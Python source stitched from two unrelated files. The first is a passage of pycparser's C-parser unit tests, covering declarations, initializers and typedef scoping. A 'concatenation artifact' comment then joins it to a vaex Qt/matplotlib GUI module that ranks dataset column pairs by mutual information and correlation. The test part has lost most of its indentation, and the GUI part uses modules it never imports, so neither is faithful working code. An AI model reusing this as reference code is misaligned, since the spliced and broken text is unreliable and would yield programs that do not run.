def test_struct_bitfields(self):
# a struct with two bitfields, one unnamed
s1 = """
struct {
int k:6;
int :2;
} joe;
"""
parsed_struct = self.parse(s1).ext[0]
# We can see here the name of the decl for the unnamed bitfield is
# None, but expand_decl doesn't show bitfield widths
# ...
self.assertEqual(expand_decl(parsed_struct),
['Decl', 'joe',
['TypeDecl', ['Struct', None,
[ ['Decl', 'k',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', None,
['TypeDecl',
['IdentifierType', ['int']]]]]]]])
# ...
# so we test them manually
self.assertEqual(parsed_struct.type.type.decls[0].bitsize.value, '6')
self.assertEqual(parsed_struct.type.type.decls[1].bitsize.value, '2')
def test_tags_namespace(self):
""" Tests that the tags of structs/unions/enums reside in a separate namespace and
can be named after existing types.
"""
s1 = """
typedef int tagEntry;
struct tagEntry
{
char* key;
char* value;
} Entry;
"""
s1_ast = self.parse(s1)
self.assertEqual(expand_decl(s1_ast.ext[1]),
['Decl', 'Entry',
['TypeDecl', ['Struct', 'tagEntry',
[['Decl', 'key',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 'value',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]]]]])
s2 = """
struct tagEntry;
typedef struct tagEntry tagEntry;
struct tagEntry
{
char* key;
char* value;
} Entry;
"""
s2_ast = self.parse(s2)
self.assertEqual(expand_decl(s2_ast.ext[2]),
['Decl', 'Entry',
['TypeDecl', ['Struct', 'tagEntry',
[['Decl', 'key',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 'value',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]]]]])
s3 = """
typedef int mytag;
enum mytag {ABC, CDE};
enum mytag joe;
"""
s3_type = self.parse(s3).ext[1].type
self.assertTrue(isinstance(s3_type, Enum))
self.assertEqual(s3_type.name, 'mytag')
def test_multi_decls(self):
d1 = 'int a, b;'
self.assertEqual(self.get_decl(d1, 0),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl(d1, 1),
['Decl', 'b', ['TypeDecl', ['IdentifierType', ['int']]]])
d2 = 'char* p, notp, ar[4];'
self.assertEqual(self.get_decl(d2, 0),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl(d2, 1),
['Decl', 'notp', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl(d2, 2),
['Decl', 'ar',
['ArrayDecl', '4',
['TypeDecl', ['IdentifierType', ['char']]]]])
def test_invalid_multiple_types_error(self):
bad = [
'int enum {ab, cd} fubr;',
'enum kid char brbr;']
for b in bad:
self.assertRaises(ParseError, self.parse, b)
def test_decl_inits(self):
d1 = 'int a = 16;'
#~ self.parse(d1).show()
self.assertEqual(self.get_decl(d1),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl_init(d1),
['Constant', 'int', '16'])
d2 = 'long ar[] = {7, 8, 9};'
#~ self.parse(d2).show()
self.assertEqual(self.get_decl(d2),
['Decl', 'ar',
['ArrayDecl', '',
['TypeDecl', ['IdentifierType', ['long']]]]])
self.assertEqual(self.get_decl_init(d2),
[ ['Constant', 'int', '7'],
['Constant', 'int', '8'],
['Constant', 'int', '9']])
d3 = 'char p = j;'
self.assertEqual(self.get_decl(d3),
['Decl', 'p', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl_init(d3),
['ID', 'j'])
d4 = "char x = 'c', *p = {0, 1, 2, {4, 5}, 6};"
self.assertEqual(self.get_decl(d4, 0),
['Decl', 'x', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl_init(d4, 0),
['Constant', 'char', "'c'"])
self.assertEqual(self.get_decl(d4, 1),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl_init(d4, 1),
[ ['Constant', 'int', '0'],
['Constant', 'int', '1'],
['Constant', 'int', '2'],
[['Constant', 'int', '4'],
['Constant', 'int', '5']],
['Constant', 'int', '6']])
def test_decl_named_inits(self):
d1 = 'int a = {.k = 16};'
self.assertEqual(self.get_decl_init(d1),
[( [['ID', 'k']],
['Constant', 'int', '16'])])
d2 = 'int a = { [0].a = {1}, [1].a[0] = 2 };'
self.assertEqual(self.get_decl_init(d2),
[
([['Constant', 'int', '0'], ['ID', 'a']],
[['Constant', 'int', '1']]),
([['Constant', 'int', '1'], ['ID', 'a'], ['Constant', 'int', '0']],
['Constant', 'int', '2'])])
d3 = 'int a = { .a = 1, .c = 3, 4, .b = 5};'
self.assertEqual(self.get_decl_init(d3),
[
([['ID', 'a']], ['Constant', 'int', '1']),
([['ID', 'c']], ['Constant', 'int', '3']),
['Constant', 'int', '4'],
([['ID', 'b']], ['Constant', 'int', '5'])])
def test_function_definitions(self):
def parse_fdef(str):
return self.parse(str).ext[0]
def fdef_decl(fdef):
return expand_decl(fdef.decl)
f1 = parse_fdef('''
int factorial(int p)
{
return 3;
}
''')
self.assertEqual(fdef_decl(f1),
['Decl', 'factorial',
['FuncDecl',
[['Decl', 'p', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]])
self.assertEqual(type(f1.body.block_items[0]), Return)
f2 = parse_fdef('''
char* zzz(int p, char* c)
{
int a;
char b;
a = b + 2;
return 3;
}
''')
self.assertEqual(fdef_decl(f2),
['Decl', 'zzz',
['FuncDecl',
[ ['Decl', 'p', ['TypeDecl', ['IdentifierType', ['int']]]],
['Decl', 'c', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]],
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(list(map(type, f2.body.block_items)),
[Decl, Decl, Assignment, Return])
f3 = parse_fdef('''
char* zzz(p, c)
long p, *c;
{
int a;
char b;
a = b + 2;
return 3;
}
''')
self.assertEqual(fdef_decl(f3),
['Decl', 'zzz',
['FuncDecl',
[ ['ID', 'p'],
['ID', 'c']],
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(list(map(type, f3.body.block_items)),
[Decl, Decl, Assignment, Return])
self.assertEqual(expand_decl(f3.param_decls[0]),
['Decl', 'p', ['TypeDecl', ['IdentifierType', ['long']]]])
self.assertEqual(expand_decl(f3.param_decls[1]),
['Decl', 'c', ['PtrDecl', ['TypeDecl', ['IdentifierType', ['long']]]]])
def test_unified_string_literals(self):
# simple string, for reference
d1 = self.get_decl_init('char* s = "hello";')
self.assertEqual(d1, ['Constant', 'string', '"hello"'])
d2 = self.get_decl_init('char* s = "hello" " world";')
self.assertEqual(d2, ['Constant', 'string', '"hello world"'])
# the test case from issue 6
d3 = self.parse(r'''
int main() {
fprintf(stderr,
"Wrong Params?\n"
"Usage:\n"
"%s <binary_file_path>\n",
argv[0]
);
}
''')
self.assertEqual(
d3.ext[0].body.block_items[0].args.exprs[1].value,
r'"Wrong Params?\nUsage:\n%s <binary_file_path>\n"')
d4 = self.get_decl_init('char* s = "" "foobar";')
self.assertEqual(d4, ['Constant', 'string', '"foobar"'])
d5 = self.get_decl_init(r'char* s = "foo\"" "bar";')
self.assertEqual(d5, ['Constant', 'string', r'"foo\"bar"'])
def test_inline_specifier(self):
ps2 = self.parse('static inline void inlinefoo(void);')
self.assertEqual(ps2.ext[0].funcspec, ['inline'])
# variable length array
def test_vla(self):
ps2 = self.parse(r'''
int main() {
int size;
int var[size = 5];
int var2[*];
}
''')
self.failUnless(isinstance(ps2.ext[0].body.block_items[1].type.dim, Assignment))
self.failUnless(isinstance(ps2.ext[0].body.block_items[2].type.dim, ID))
class TestCParser_whole_code(TestCParser_base):
""" Testing of parsing whole chunks of code.
Since I don't want to rely on the structure of ASTs too
much, most of these tests are implemented with visitors.
"""
# A simple helper visitor that lists the values of all the
# Constant nodes it sees.
#
class ConstantVisitor(NodeVisitor):
def __init__(self):
self.values = []
def visit_Constant(self, node):
self.values.append(node.value)
# This visitor counts the amount of references to the ID
# with the name provided to it in the constructor.
#
class IDNameCounter(NodeVisitor):
def __init__(self, name):
self.name = name
self.nrefs = 0
def visit_ID(self, node):
if node.name == self.name:
self.nrefs += 1
# Counts the amount of nodes of a given class
#
class NodeKlassCounter(NodeVisitor):
def __init__(self, node_klass):
self.klass = node_klass
self.n = 0
def generic_visit(self, node):
if node.__class__ == self.klass:
self.n += 1
NodeVisitor.generic_visit(self, node)
def assert_all_Constants(self, code, constants):
""" Asserts that the list of all Constant values (by
'preorder' appearance) in the chunk of code is as
given.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
cv = self.ConstantVisitor()
cv.visit(parsed)
self.assertEqual(cv.values, constants)
def assert_num_ID_refs(self, code, name, num):
""" Asserts the number of references to the ID with
the given name.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
iv = self.IDNameCounter(name)
iv.visit(parsed)
self.assertEqual(iv.nrefs, num)
def assert_num_klass_nodes(self, code, klass, num):
""" Asserts the amount of klass nodes in the code.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
cv = self.NodeKlassCounter(klass)
cv.visit(parsed)
self.assertEqual(cv.n, num)
def test_expressions(self):
e1 = '''int k = (r + 10.0) >> 6 + 8 << (3 & 0x14);'''
self.assert_all_Constants(e1, ['10.0', '6', '8', '3', '0x14'])
e2 = r'''char n = '\n', *prefix = "st_";'''
self.assert_all_Constants(e2, [r"'\n'", '"st_"'])
def test_statements(self):
s1 = r'''
void foo(){
if (sp == 1)
if (optind >= argc ||
argv[optind][0] != '-' || argv[optind][1] == '\0')
return -1;
else if (strcmp(argv[optind], "--") == 0) {
optind++;
return -1;
}
}
'''
self.assert_all_Constants(s1,
['1', '0', r"'-'", '1', r"'\0'", '1', r'"--"', '0', '1'])
ps1 = self.parse(s1)
self.assert_num_ID_refs(ps1, 'argv', 3)
self.assert_num_ID_refs(ps1, 'optind', 5)
self.assert_num_klass_nodes(ps1, If, 3)
self.assert_num_klass_nodes(ps1, Return, 2)
self.assert_num_klass_nodes(ps1, FuncCall, 1) # strcmp
self.assert_num_klass_nodes(ps1, BinaryOp, 7)
# In the following code, Hash and Node were defined as
# int to pacify the parser that sees they're used as
# types
#
s2 = r'''
typedef int Hash, Node;
void HashDestroy(Hash* hash)
{
unsigned int i;
if (hash == NULL)
return;
for (i = 0; i < hash->table_size; ++i)
{
Node* temp = hash->heads[i];
while (temp != NULL)
{
Node* temp2 = temp;
free(temp->entry->key);
free(temp->entry->value);
free(temp->entry);
temp = temp->next;
free(temp2);
}
}
free(hash->heads);
hash->heads = NULL;
free(hash);
}
'''
ps2 = self.parse(s2)
self.assert_num_klass_nodes(ps2, FuncCall, 6)
self.assert_num_klass_nodes(ps2, FuncDef, 1)
self.assert_num_klass_nodes(ps2, For, 1)
self.assert_num_klass_nodes(ps2, While, 1)
self.assert_num_klass_nodes(ps2, StructRef, 10)
# declarations don't count
self.assert_num_ID_refs(ps2, 'hash', 6)
self.assert_num_ID_refs(ps2, 'i', 4)
s3 = r'''
void x(void) {
int a, b;
if (a < b)
do {
a = 0;
} while (0);
else if (a == b) {
a = 1;
}
}
'''
ps3 = self.parse(s3)
self.assert_num_klass_nodes(ps3, DoWhile, 1)
self.assert_num_ID_refs(ps3, 'a', 4)
self.assert_all_Constants(ps3, ['0', '0', '1'])
def test_empty_statement(self):
s1 = r'''
void foo(void){
;
return;
}
'''
ps1 = self.parse(s1)
self.assert_num_klass_nodes(ps1, EmptyStatement, 1)
self.assert_num_klass_nodes(ps1, Return, 1)
def test_for_statement(self):
s2 = r'''
void x(void)
{
int i;
for (i = 0; i < 5; ++i) {
x = 50;
}
}
'''
ps2 = self.parse(s2)
self.assert_num_klass_nodes(ps2, For, 1)
# here there are 3 refs to 'i' since the declaration doesn't count as
# a ref in the visitor
#
self.assert_num_ID_refs(ps2, 'i', 3)
s3 = r'''
void x(void)
{
for (int i = 0; i < 5; ++i) {
x = 50;
}
}
'''
ps3 = self.parse(s3)
self.assert_num_klass_nodes(ps3, For, 1)
# here there are 2 refs to 'i' since the declaration doesn't count as
# a ref in the visitor
#
self.assert_num_ID_refs(ps3, 'i', 2)
def _open_c_file(self, name):
""" Find a c file by name, taking into account the current dir can be
in a couple of typical places
"""
fullnames = [
os.path.join('c_files', name),
os.path.join('tests', 'c_files', name)]
for fullname in fullnames:
if os.path.exists(fullname):
return open(fullname, 'rU')
assert False, "Unreachable"
def test_whole_file(self):
# See how pycparser handles a whole, real C file.
#
code = self._open_c_file('memmgr_with_h.c').read()
p = self.parse(code)
self.assert_num_klass_nodes(p, FuncDef, 5)
# each FuncDef also has a FuncDecl. 4 declarations
# + 5 definitions, overall 9
self.assert_num_klass_nodes(p, FuncDecl, 9)
self.assert_num_klass_nodes(p, Typedef, 4)
self.assertEqual(p.ext[4].coord.line, 88)
self.assertEqual(p.ext[4].coord.file, "./memmgr.h")
self.assertEqual(p.ext[6].coord.line, 10)
self.assertEqual(p.ext[6].coord.file, "memmgr.c")
def test_whole_file_with_stdio(self):
# Parse a whole file with stdio.h included by cpp
#
code = self._open_c_file('cppd_with_stdio_h.c').read()
p = self.parse(code)
self.failUnless(isinstance(p.ext[0], Typedef))
self.assertEqual(p.ext[0].coord.line, 213)
self.assertEqual(p.ext[0].coord.file, "D:\eli\cpp_stuff\libc_include/stddef.h")
self.failUnless(isinstance(p.ext[-1], FuncDef))
self.assertEqual(p.ext[-1].coord.line, 15)
self.assertEqual(p.ext[-1].coord.file, "example_c_file.c")
self.failUnless(isinstance(p.ext[-8], Typedef))
self.failUnless(isinstance(p.ext[-8].type, TypeDecl))
self.assertEqual(p.ext[-8].name, 'cookie_io_functions_t')
class TestCParser_typenames(TestCParser_base):
    """ Test issues related to the typedef-name problem.
    """
    def test_innerscope_typedef(self):
        """A typedef introduced inside a function must not leak into
        other scopes."""
        # should fail since TT is not a type in bar
        s1 = r'''
            void foo() {
                typedef char TT;
                TT x;
            }
            void bar() {
                TT y;
            }
            '''
        self.assertRaises(ParseError, self.parse, s1)

        # should succeed: in bar, TT is declared as an ordinary identifier
        # (the typedef was scoped to foo, so the name is free here).
        # (Original comment wrongly repeated "TT is not a type in bar".)
        s2 = r'''
            void foo() {
                typedef char TT;
                TT x;
            }
            void bar() {
                unsigned TT;
            }
            '''
        # assertIsInstance replaces the deprecated failUnless alias
        # (removed in Python 3.12).
        self.assertIsInstance(self.parse(s2), FileAST)
if __name__ == '__main__':
    # Run the whole suite. To run a single test, pass its dotted name on
    # the command line, e.g.:
    #   python test_c_parser.py TestCParser_fundamentals.test_typedef
    # (Removed the commented-out manual TestLoader snippets — dead code
    # that unittest.main()'s argv handling already covers.)
    unittest.main()
# ---- concatenation artifact: end of the parser test module, start of the
# ---- vaex ranking module (two stray '|' characters repaired here)
import itertools
import numpy as np
# from pyjavaproperties import Properties
from vaex.ext import jprops
import collections
import functools
from vaex.ui.qt import *
import vaex.dataset
import vaex.ui.plot_windows
import logging as logging
import vaex.ui.qt as dialogs
import vaex.execution
import vaex.kld
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
# from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
import scipy.stats
logger = logging.getLogger("vaex.ranking")
# since we do many columns at once, a smallar buffer will lead to more resposiveness in the gui
buffer_size = 1e6
def unique_column_names(dataset):
    """Return all column names of *dataset*, virtual columns included."""
    names = dataset.get_column_names(virtual=True)
    return names
testing = False
class PlotDialog(QtGui.QDialog):
    """Qt dialog embedding a matplotlib figure with a navigation toolbar
    and mouse-tracking tooltip support.

    Subclasses implement plot() and (if they want tooltips/clicks)
    get_tooltip()/on_mouse_button(); see RankPlot below.
    """
    def __init__(self, parent, width=5, height=4, dpi=100, **options):
        super(PlotDialog, self).__init__()
        self.parent_widget = parent
        # Bug fix: width/height/dpi were accepted but silently ignored;
        # forward them to the figure so callers can actually size it.
        self.figure = plt.figure(figsize=(width, height), dpi=dpi)
        self.canvas = FigureCanvas(self.figure)
        self.toolbar = NavigationToolbar(self.canvas, self)
        self.layout = QtGui.QVBoxLayout()
        self.layout.addWidget(self.toolbar)
        self.layout.addWidget(self.canvas)
        self.setLayout(self.layout)
        # The private handlers filter out events outside the axes
        # (matplotlib reports xdata/ydata as None there).
        self.figure.canvas.mpl_connect('motion_notify_event', self._on_mouse_motion)
        self.figure.canvas.mpl_connect('button_press_event', self._on_mouse_button)

    def _on_mouse_motion(self, event):
        if event.xdata is not None and event.ydata is not None:
            self.on_mouse_motion(event)

    def _on_mouse_button(self, event):
        if event.xdata is not None and event.ydata is not None:
            self.on_mouse_button(event)

    def on_mouse_button(self, event):
        # Hook for subclasses; default is a no-op.
        pass

    def on_mouse_motion(self, event):
        # get_tooltip must be provided by the subclass (see RankPlot).
        label, x, y = self.get_tooltip(event)
        self.set_tooltip(x, y, label)

    def set_tooltip(self, x, y, label):
        """Show *label* as a Qt tooltip at canvas position (x, y)."""
        # matplotlib's y axis grows upward, Qt's grows downward: flip it.
        y = self.canvas.height() - 1 - y
        # Replaced bare print() debugging with the module logger.
        logger.debug("tooltip: label=%r x=%s y=%s", label, x, y)
        if label:
            point = QtCore.QPoint(x + self.canvas.x() + self.pos().x(),
                                  y + self.canvas.y() + self.pos().y())
            QtGui.QToolTip.showText(point, label)

    def plot(self):
        # Hook for subclasses; default is a no-op.
        pass
class RankPlot(PlotDialog):
    """Scatter plot of subspace-quality measures for the pairs selected in
    *table* (mutual information vs. correlation coefficient, optionally
    ranked). Clicking a point selects the corresponding pair in the table.
    """
    def __init__(self, parent, table):
        super(RankPlot, self).__init__(parent)
        self.table = table
        self.button_update_data = QtGui.QPushButton('Update data')
        self.button_update_data.clicked.connect(self.update_data)
        self.layout.addWidget(self.button_update_data)
        grid_layout = QtGui.QGridLayout()
        grid_layout.setColumnStretch(2, 1)
        grid_layout.setAlignment(QtCore.Qt.AlignTop)
        grid_layout.setSpacing(0)
        grid_layout.setContentsMargins(0, 0, 0, 0)
        self.layout.addLayout(grid_layout)
        row = 0
        # Expressions the user may choose for either axis; evaluated in plot().
        self.options = ["mutual_information", "rank(mutual_information)", "correlation_coefficient", "rank(correlation_coefficient)", "abs(correlation_coefficient)", "rank(abs(correlation_coefficient))"]
        self.expression_x = "mutual_information"
        self.expression_y = "correlation_coefficient"
        # NOTE(review): Codeline/attrgetter/attrsetter presumably come from
        # the `from vaex.ui.qt import *` at the top of the file — confirm.
        self.codeline_x = Codeline(self, "x", self.options,
            getter=attrgetter(self, "expression_x"),
            setter=attrsetter(self, "expression_x"),
            update=self.plot)
        self.codeline_y = Codeline(self, "y", self.options,
            getter=attrgetter(self, "expression_y"),
            setter=attrsetter(self, "expression_y"),
            update=self.plot)
        row = self.codeline_x.add_to_grid_layout(row, grid_layout)
        row = self.codeline_y.add_to_grid_layout(row, grid_layout)
        self.axes = self.figure.add_subplot(111)
        # Disabled experiment: select pairs via matplotlib's pick_event
        # instead of the button_press_event path in on_mouse_button.
        if 0:
            def onpick(event):
                thisline = event.artist
                xdata = thisline.get_xdata()
                ydata = thisline.get_ydata()
                index = event.ind
                print((index, xdata[index], ydata[index], self.pairs[index]))
                self.table.select_pair(self.pairs[index])
            self.figure.canvas.mpl_connect('pick_event', onpick)
        self.update_data()
        self.plot()

    def on_mouse_button(self, event):
        """Select the pair nearest to the click in the table, then refresh
        the tooltip shortly after (the selection may change the view)."""
        min_distance_index, x, y = self.find_nearest(event)
        print(("click", x, y))
        self.table.select_pair(self.pairs[min_distance_index])

        def update_tooltip():
            label, x, y = self.get_tooltip(event)
            self.set_tooltip(x, y, label)
        # Delay so the tooltip reflects the state after the selection.
        QtCore.QTimer.singleShot(100, update_tooltip)

    def find_nearest(self, event):
        """Return (index, display_x, display_y) of the plotted point nearest
        to *event* in screen (pixel) space."""
        # Map data coordinates to display pixels so distance matches what
        # the user sees on screen.
        transform = event.inaxes.transData.transform
        xy = transform(list(zip(self.x, self.y)))
        # print xy
        x, y = xy.T
        print(("event.x/y", event.x, event.y))
        distances = np.sqrt((x - event.x)**2 + (y - event.y)**2)
        min_distance_index = np.argmin(distances)
        return min_distance_index, x[min_distance_index], y[min_distance_index]

    def get_tooltip(self, event):
        """Tooltip text is the 'a-b' name of the nearest pair."""
        min_distance_index, x, y = self.find_nearest(event)
        label = "-".join(self.pairs[min_distance_index])
        return label, x, y

    def update_data(self):
        """Pull mutual-information and correlation values for the pairs
        currently selected in the table into self.variables."""
        self.variables = {}
        self.pairs = pairs = self.table.getSelected()
        mi = [self.table.qualities[pair] for pair in pairs]
        corr = [self.table.correlation_map[pair] for pair in pairs]
        self.variables["mutual_information"] = np.array(mi)
        self.variables["correlation_coefficient"] = np.array(corr)

    def plot(self):
        """Evaluate the axis expressions against the cached variables and
        redraw the scatter plot."""
        # The evaluation scope exposes all of numpy, the cached data
        # arrays, and a rank() helper.
        scope = {}
        scope.update(np.__dict__)
        scope.update(self.variables)
        scope["rank"] = scipy.stats.rankdata
        # NOTE(review): eval() of a user-supplied expression executes
        # arbitrary code — acceptable for a local GUI tool, but never feed
        # it untrusted input.
        self.x = x = eval(self.expression_x, scope)
        self.y = y = eval(self.expression_y, scope)
        self.axes.cla()
        # picker=5: points are clickable within a 5-pixel tolerance.
        self.axes.plot(x, y, '.', picker=5)
        self.canvas.draw()
class ____RankingTableModel(QtCore.QAbstractTableModel):
    """Model/view variant of the ranking table.

    NOTE(review): the leading underscores in the class name suggest this is
    disabled/dead code (SubspaceTable is used instead); it also returns random
    placeholder data in :meth:`data` -- do not re-enable without review.
    """

    def __init__(self, dataset, dim=1, parent=None, *args):
        QtCore.QAbstractTableModel.__init__(self, parent, *args)
        self.dataset = dataset
        # all dim-sized combinations of the dataset's unique column names
        self.pairs = list(itertools.combinations(unique_column_names(self.dataset), dim))
        self.ranking = [None for pair in self.pairs]
        # NOTE(review): "MI ranking" appears twice; the fifth entry was
        # probably meant to be a correlation ranking -- confirm before reuse
        self.headers = ["subspace", "Mutual information", "MI ranking", "correlation", "MI ranking", 'selected']
        # mapping from display row to data index (changed by sort())
        self.indices = list(range(len(self.pairs)))

    def rowCount(self, parent):
        """One row per subspace pair."""
        return len(self.pairs)

    def columnCount(self, parent):
        """Fixed number of columns, one per header."""
        return len(self.headers)

    def data(self, index, role):
        """Return the display value for a cell, honoring the sorted order."""
        if not index.isValid():
            return None
        elif role != QtCore.Qt.DisplayRole:
            return None
        column = index.column()
        index = self.indices[index.row()]  # use sorted index
        if column == 0:
            return "-vs".join(self.pairs[index])
        if column == 1:
            rank = self.ranking[index]
            return "" if rank is None else str(rank)
        if column == 2:
            rank = self.ranking[index]
            # NOTE(review): placeholder -- returns a random bool, not real data
            return False if random.random() < 0.5 else True
        # columns > 2 implicitly return None (blank cells)

    def headerData(self, index, orientation, role):
        """Column titles from self.headers; row numbers for the vertical header."""
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return self.headers[index]
        if orientation == QtCore.Qt.Vertical and role == QtCore.Qt.DisplayRole:
            return str(index + 1)
        return None

    def sort(self, Ncol, order):
        """Sort table by given column number.
        """
        self.emit(QtCore.SIGNAL("layoutAboutToBeChanged()"))
        if Ncol == 0:
            print("by name")
            # get indices, sorted by pair name
            sortlist = list(zip(self.pairs, list(range(len(self.pairs)))))
            print(sortlist)
            sortlist.sort(key=operator.itemgetter(0))
            print(sortlist)
            self.indices = list(map(operator.itemgetter(1), sortlist))
            print((self.indices))
        if Ncol == 1:
            # get indices, sorted by ranking, or no sorting
            if None not in self.ranking:
                sortlist = list(zip(self.ranking, list(range(len(self.pairs)))))
                sortlist.sort(key=operator.itemgetter(0))
                self.indices = list(map(operator.itemgetter(1), sortlist))
            else:
                self.indices = list(range(len(self.pairs)))
            print((self.indices))
        if order == QtCore.Qt.DescendingOrder:
            self.indices.reverse()
        print((self.indices))
        self.emit(QtCore.SIGNAL("layoutChanged()"))
class SubspaceTable(QtGui.QTableWidget):
    """Table widget listing candidate subspaces (column combinations) of a dataset.

    Each row shows a selection checkbox, the subspace name, either the stored
    min/max (dim == 1) or the computed mutual information / correlation
    (dim > 1), and a plot button.

    Bug fixed relative to the original: ``setPairs`` stored the raw property
    string ("True"/"False") as the selection state, so a stored "False" was
    truthy and the pair showed up checked; it now compares against "True",
    consistent with ``__init__``.
    """

    def __init__(self, dialog, parent, mainPanel, dataset, pairs, dim, properties):
        """:param dialog: owning RankDialog (provides range_map)
        :param mainPanel: panel with histogram/plotxy/plotxyz methods
        :param pairs: list of tuples of expression names (length == dim)
        :param properties: persisted key/value settings (".use", ".min", ".max")
        """
        self.dialog = dialog
        self.dim = dim
        if dim == 1:
            self.headers = ['', 'space', "min", "max", 'plot']
        else:
            self.headers = ['', 'space', "Mutual information", "Correlation", 'plot']
        self.properties = properties
        self.qualities = {}        # pair -> mutual information
        self.correlation_map = {}  # pair -> correlation coefficient
        if testing:
            # fill with random data so the UI can be exercised without calculations
            self.qualities = {key: np.random.random() for key in pairs}
            self.correlation_map = {key: np.random.normal() for key in pairs}
        self.dataset = dataset
        self.filter_terms = []
        self.mainPanel = mainPanel
        self.pairs = list(pairs)
        QtGui.QTableWidget.__init__(self, len(self.pairs), len(self.headers), parent)
        self.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.filter_mask = np.array([True for pair in pairs])
        # selection state restored from the stored properties (default: selected)
        self.selected_dict = {pair: self.properties.get(".".join(pair) + ".use", "True") == "True" for pair in pairs}
        self.defaultFlags = QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable
        self.setHorizontalHeaderLabels(self.headers)
        self.fill_table()
        self.setSortingEnabled(True)
        # debounce repeated refills (e.g. while typing filter terms)
        self.queue_fill_table = vaex.ui.plot_windows.Queue("fill table", 200, self.fill_table)

    def pair_to_text(self, pair):
        """Human-readable row label for a pair of expressions."""
        return " ".join(map(str, pair))

    def select_pair(self, pair):
        """Highlight the row showing *pair* (linear scan, rows may be sorted/filtered)."""
        index = self.pairs.index(pair)
        for i in range(self.rowCount()):
            item = self.item(i, 1)
            print((item.text(), self.pair_to_text(pair)))
            if item.text() == self.pair_to_text(pair):
                self.selectRow(i)

    def fill_table(self):
        """(Re)populate all rows from self.pairs, honoring filter_mask.

        Sorting is disabled during the rebuild and re-enabled afterwards to
        work around a Qt quirk where cells stay empty after sorting:
        http://stackoverflow.com/questions/7960505
        """
        self.setSortingEnabled(False)
        self.checkboxes = []
        self.buttons = []  # keep references so Qt does not garbage collect the widgets
        pairs = [pair for pair, display in zip(self.pairs, self.filter_mask) if display]
        self.setRowCount(len(pairs))
        self.setVerticalHeaderLabels(list(map(str, list(range(len(pairs))))))
        for i in range(len(pairs)):
            pair = pairs[i]
            text = self.pair_to_text(pair)
            item = QtGui.QTableWidgetItem(text)
            self.setItem(i, 1, item)
            item.setFlags(self.defaultFlags)
            checkbox = QtGui.QCheckBox(self)
            use_key = ".".join(map(str, pair)) + ".use"
            print(("fill", pair, self.selected_dict[pair]))
            checkbox.setCheckState(QtCore.Qt.Checked if self.selected_dict[pair] else QtCore.Qt.Unchecked)
            self.checkboxes.append(checkbox)
            self.setCellWidget(i, 0, checkbox)

            # default argument binds the current pair (late-binding closure fix)
            def stateChanged(state, pair=pair):
                self.selected_dict[pair] = state == QtCore.Qt.Checked
                print(("set", pair, "to", self.selected_dict[pair]))
            checkbox.stateChanged.connect(stateChanged)
            if self.dim == 1:
                button = QtGui.QPushButton("plot: " + text, self)

                def plot(_ignore=None, pair=pair):
                    ranges = [self.dialog.range_map[k] for k in pair]
                    self.mainPanel.histogram(*pair, ranges=ranges)
                button.clicked.connect(plot)
                self.setCellWidget(i, 4, button)
                # columns 2/3 show the stored min/max, when available
                min_key = pair[0] + ".min"
                max_key = pair[0] + ".max"
                if min_key in self.properties:
                    item = QtGui.QTableWidgetItem()
                    value = self.properties[min_key]
                    item.setText("%s" % value)
                    item.setData(QtCore.Qt.DisplayRole, float(value))
                    item.setFlags(self.defaultFlags)
                    self.setItem(i, 2, item)
                if max_key in self.properties:
                    value = self.properties[max_key]
                    item = QtGui.QTableWidgetItem()
                    item.setText("%s" % value)
                    item.setData(QtCore.Qt.DisplayRole, float(value))
                    item.setFlags(self.defaultFlags)
                    self.setItem(i, 3, item)
            else:
                # columns 2/3 show mutual information and correlation, when computed
                quality = self.qualities.get(pair)
                if quality is not None:
                    item = QtGui.QTableWidgetItem()
                    item.setText("%s" % quality)
                    item.setData(QtCore.Qt.DisplayRole, float(quality))
                    item.setFlags(self.defaultFlags)
                    self.setItem(i, 2, item)
                correlation = self.correlation_map.get(pair)
                if correlation is not None:
                    item = QtGui.QTableWidgetItem()
                    item.setText("%s" % correlation)
                    item.setData(QtCore.Qt.DisplayRole, float(correlation))
                    item.setFlags(self.defaultFlags)
                    self.setItem(i, 3, item)
                if self.dim == 2:
                    button = QtGui.QPushButton("plot: " + text, self)

                    def plot(_ignore=None, pair=pair):
                        ranges = [self.dialog.range_map[k] for k in pair]
                        self.mainPanel.plotxy(*pair, ranges=ranges)
                    button.clicked.connect(plot)
                    self.setCellWidget(i, 4, button)
                    self.buttons.append(button)  # keep ref count
                if self.dim == 3:
                    button = QtGui.QPushButton("plot: " + text, self)

                    def plot(_ignore=None, pair=pair):
                        ranges = [self.dialog.range_map[k] for k in pair]
                        self.mainPanel.plotxyz(*pair, ranges=ranges)
                    button.clicked.connect(plot)
                    self.setCellWidget(i, 4, button)
                    self.buttons.append(button)  # keep ref count
